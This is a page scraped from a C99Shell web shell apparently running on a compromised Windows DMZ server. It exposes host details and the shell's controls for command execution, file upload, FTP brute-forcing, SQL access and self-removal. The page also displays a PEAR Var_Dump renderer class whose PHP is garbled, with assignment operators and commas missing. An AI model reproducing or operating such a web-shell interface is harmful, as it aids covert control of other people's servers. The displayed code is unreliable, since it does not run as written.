!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\xampp\php\PEAR\Var_Dump\Renderer\   drwxrwxrwx
Free 4.09 GB of 39.52 GB (10.35%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Common.php (3.54 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/* vim: set expandtab tabstop=4 shiftwidth=4: */
// +----------------------------------------------------------------------+
// | PHP version 4                                                        |
// +----------------------------------------------------------------------+
// | Copyright (c) 1997-2004 The PHP Group                                |
// +----------------------------------------------------------------------+
// | This source file is subject to version 3.0 of the PHP license,       |
// | that is bundled with this package in the file LICENSE, and is        |
// | available through the world-wide-web at the following url:           |
// | http://www.php.net/license/3_0.txt.                                  |
// | If you did not receive a copy of the PHP license and are unable to   |
// | obtain it through the world-wide-web, please send a note to          |
// | license@php.net so we can mail you a copy immediately.               |
// +----------------------------------------------------------------------+
// | Authors: Frederic Poeydomenge <fpoeydomenge at free dot fr>          |
// +----------------------------------------------------------------------+
//
// $Id$

/**
 * A base class for Var_Dump renderers, must be inherited by all such.
 *
 * @package Var_Dump
 * @category PHP
 * @author Frederic Poeydomenge <fpoeydomenge at free dot fr>
 */

class Var_Dump_Renderer_Common
{

    
/**
     * Run-time configuration options.
     *
     * @var array
     * @access public
     */
    
var $options = array();

    
/**
     * Default configuration options.
     *
     * See Var_Dump/Renderer/*.php for the complete list of options
     *
     * @var array
     * @access public
     */
    
var $defaultOptions = array();

    
/**
     * Array containing the element family : start/finish group, start/finish element
     *
     * @var array
     * @access public
     */
    
var $family;

    
/**
     * Array containing the element depths
     *
     * @var array
     * @access public
     */
    
var $depth;

    
/**
     * Array containing the element types
     *
     * @var array
     * @access public
     */
    
var $type;

    
/**
     * Array containing the element values
     *
     * @var array
     * @access public
     */
    
var $value;

    
/**
     * Array containing the strlen of keys for all the nested arrays
     *
     * @var array
     * @access public
     */
    
var $keyLen;

    
/**
     * Set run-time configuration options for the renderer
     *
     * @param array $options Run-time configuration options.
     * @access public
     */
    
function setOptions($options = array())
    {
        
$this->options array_merge($this->defaultOptions$options);
    }

    
/**
     * Initialize internal data structures for the rendering.
     *
     * @param array $family Containing the element family.
     * @param array $depth Containing the element depths.
     * @param array $type Containing the element types.
     * @param array $value Containing the element values.
     * @param array $keyLen Strlen of keys for all the nested arrays
     * @access public
     */
    
function initialize(& $family, & $depth, & $type, & $value, & $keyLen)
    {
        
$this->family $family;
        
$this->depth  $depth;
        
$this->type   $type;
        
$this->value  $value;
        
$this->keyLen $keyLen;
    }

    
/**
     * Returns the string representation of a variable
     *
     * @return string The string representation of the variable.
     * @access public
     * @abstract
     */
    
function toString()
    {
    }

}

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--